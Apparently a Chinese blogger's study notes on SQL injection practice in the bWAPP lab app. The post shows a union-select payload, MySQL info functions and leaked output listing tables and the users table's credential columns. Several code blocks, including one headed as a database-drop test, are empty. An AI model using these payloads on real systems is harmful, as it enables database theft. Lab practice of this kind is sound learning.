简单sql注入学习
文章目录
sql 注入学习
sql注入猜解
|
|
bwapp使用
- 访问 /install.php 初始化应用
- 点击 sql injection(get/search) 练习
输入 1’ 进行搜索
结果:Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
输入: ' union select 1,2,user(),4,5,6,7 -- '
World War Z | 2013 | Gerry Lane | horror | Link |
---|---|---|---|---|
2 | root@localhost | 5 | 4 | Link |
后面返回结果如图
常用函数 | |
---|---|
database() | 数据库名字 |
user() | 用户 |
table_name | 表名 |
version() | 版本号 |
information_schema.tables | 元信息 |
获取数据库信息
|
|
得到结果如下
root@localhost | blog | bWAPP | 5.5.47-0ubuntu0.14.04.1 | Link |
---|---|---|---|---|
root@localhost | heroes | bWAPP | 5.5.47-0ubuntu0.14.04.1 | Link |
root@localhost | movies | bWAPP | 5.5.47-0ubuntu0.14.04.1 | Link |
root@localhost | users | bWAPP | 5.5.47-0ubuntu0.14.04.1 | Link |
root@localhost | visitors | bWAPP | 5.5.47-0ubuntu0.14.04.1 | Link |
|
|
得到表信息
World War Z | 2013 | Gerry Lane | horror | Link |
---|---|---|---|---|
id,login,password,email,secret,activation_code,activated,reset_code,admin | root@localhost | 5 | 4 | Link |
删库测试
|
|
查询数据库版本
|
|
查询数据库
|
|
文章作者 LYR
上次更新 2021-08-17